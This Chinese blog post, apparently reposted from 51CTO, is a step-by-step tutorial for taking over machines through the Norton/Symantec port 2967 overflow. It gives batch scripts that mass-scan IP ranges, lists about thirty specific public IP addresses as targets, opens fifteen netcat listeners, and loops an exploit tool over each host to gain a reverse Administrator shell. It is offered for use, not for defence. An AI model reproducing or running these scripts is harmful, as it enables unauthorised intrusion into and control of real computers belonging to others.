编写批处理文件利用诺顿2967端口溢出获得控制权

简介:

需要准备的软件工具:

s.exe      symantec.exe      nc.exe

1、首先编写一个批处理文件利用s.exe扫描远程机器的2967端口。

文件名为sao.bat,内容如下:

@echo Title 诺顿2967扫描工具,制作bye 高迪
color A
@set IPSTART= 
@set IPEND= 
@set XIANCHENG=5
@echo 在进行溢出之前,您必须进行扫描.
set /p IPSTART=请输入起始地址:
set /p IPEND=请输入结束地址:
set /p XIANCHENG=请输入s.exe扫描的线程数(缺省为5个):
echo 现在正在扫描,如果您要停止该进程请按Ctrl+C.
s.exe tcp %IPSTART% %IPEND% 2967 %XIANCHENG% /save

2、扫描结束后打开Result.txt将扫描到的ip地址复制在host.txt文件内保存,文件格式如下(每行一个IP即可):

218.56.22.114
202.152.40.146 
202.152.41.28 
202.152.41.31 
202.152.41.29 
202.152.41.30 
202.152.41.200 
202.152.41.201 
202.152.41.203 
202.152.41.202 
202.152.41.204 
202.152.41.205 
202.152.41.206 
202.152.41.207 
202.152.41.208 
202.152.41.209 
202.152.41.210 
202.152.41.211 
202.152.41.212 
202.152.41.213 
202.152.41.214 
202.152.41.215 
202.152.41.249 
202.152.41.250 
202.152.41.251 
202.152.41.252 
202.152.41.253 
202.152.41.254 
202.152.41.248 

3、编写nc2008.bat,内容如下:

@echo off
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234
@start nc -vv -l -p 1234

4、编写2967.bat,内容如下:

@set IP= 
color B
echo 探测本机IP地址并赋值给IP
for /f "tokens=15" %%i in ('ipconfig ^| find /i "ip address"') do set ip=%%i
@for /f %%i in (host.txt) do symantec -r %%i -l %IP% -d 1234

5、 好了,运行nc2008.bat,再运行2967.bat,观察刚才打开的15个CMD窗口,如果有哪个窗口返回C:\Documents and Settings\Administrator> 就OK了,输入ipconfig 看看该机器IP地址是什么,用ver查看一下系统版本,后面的步骤我就不说了。嘿嘿。。。搞定。。。。。。。。。

不过现在绝大多数机器已经把这个漏洞都补上了,扫描可能要费很大功夫。


#网络安全  


本文转自gaodi2002 51CTO博客,原文链接:http://blog.51cto.com/gaodi2002/1618193


相关文章
|
5月前
|
Shell PHP Windows
来自红队大佬的经验之谈---命令执行过滤绕过-Windows篇
感谢来自老流氓大佬的投稿,本次文章介绍的是在windows环境下,过滤的“点”和“空格”等符号,如何利用windowsit特性进行绕过
|
4月前
|
Windows
【计算机网络】已解决:“‘ping‘ 不是内部或外部命令,也不是可运行的程序或批处理文件”报错
【计算机网络】已解决:“‘ping‘ 不是内部或外部命令,也不是可运行的程序或批处理文件”报错
396 0
|
存储 安全 Shell
1.6 编写双管道ShellCode后门
本文将介绍如何将`CMD`绑定到双向管道上,这是一种常用的黑客反弹技巧,可以让用户在命令行界面下与其他程序进行交互,我们将从创建管道、启动进程、传输数据等方面对这个功能进行详细讲解。此外,本文还将通过使用汇编语言一步步来实现这个可被注入的`ShellCode`后门,并以此提高代码通用性。最终,我们将通过一个实际的漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。
77 0
|
NoSQL Redis Windows
Windows服务简单一例,捕获关机信号做些处理
Windows服务简单一例,捕获关机信号做些处理
关于 虚拟机交叉编译目标机程序,使用filezilla的ftp方式传输到板子上没问题,后来同样环境传入应用运行宕机 的解决方法
关于 虚拟机交叉编译目标机程序,使用filezilla的ftp方式传输到板子上没问题,后来同样环境传入应用运行宕机 的解决方法
关于 虚拟机交叉编译目标机程序,使用filezilla的ftp方式传输到板子上没问题,后来同样环境传入应用运行宕机 的解决方法